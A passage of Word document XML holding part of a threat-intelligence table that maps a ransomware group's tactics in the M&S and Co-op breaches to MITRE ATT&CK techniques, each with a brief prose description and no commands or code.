              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="14257AC6" w14:textId="38A6059C" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>The actor's TTPs generally involve initiating help-desk driven MFA resets, defeating multi-factor authentication as a control (assumption based on group TTPs).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="0E43F9C3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48361C24" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5EE2631F" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Account Manipulation (T1098)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E01987F" w14:textId="1C2CED4B" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Establishing or resetting authenticator devices to provide persistent access with a legitimate identity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="36775922" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="60D1551A" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="59BAA72D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Domain Trust / Account Discovery (T1482 / T1087)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="68AC564B" w14:textId="73F9EA3C" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Enumerate Active Directory to identify privileged accounts and trust relationships before escalation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="3EAA0D96" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1BA337AF" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F9BEF3E" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OS Credential Dumping: NTDS (T1003.003)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C35FFFA" w14:textId="46E0277E" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">M&amp;S reports directly specifies exfiltration of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file from domain controller – Active Directory credential storage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="446CA08C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1CD7FF66" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="256D9F9B" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Remote Services (T1021)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7990D5F2" w14:textId="778CBF97" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Moving laterally across the estate to reach virtualization and business-critical hosts, consistent with domain-wide breach.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="287B7D17" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1657E99D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="45A9DBD7" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Data from Information Repositories (T1213)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20639C9A" w14:textId="40909197" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00ED2635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Bulk customer and member data was acquired pre-disruption (6.5m Co-op members; M&amp;S customer data).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="731A8478" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="247A973A" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0E084492" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel (T1041)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4629" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E3B46DD" w14:textId="07824233" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001B28AA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Confirmed data theft prior to encryption, consistent with double-extortion tradecraft.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="76B3B14E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5B58D6EB" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3461" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A39E1CA" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
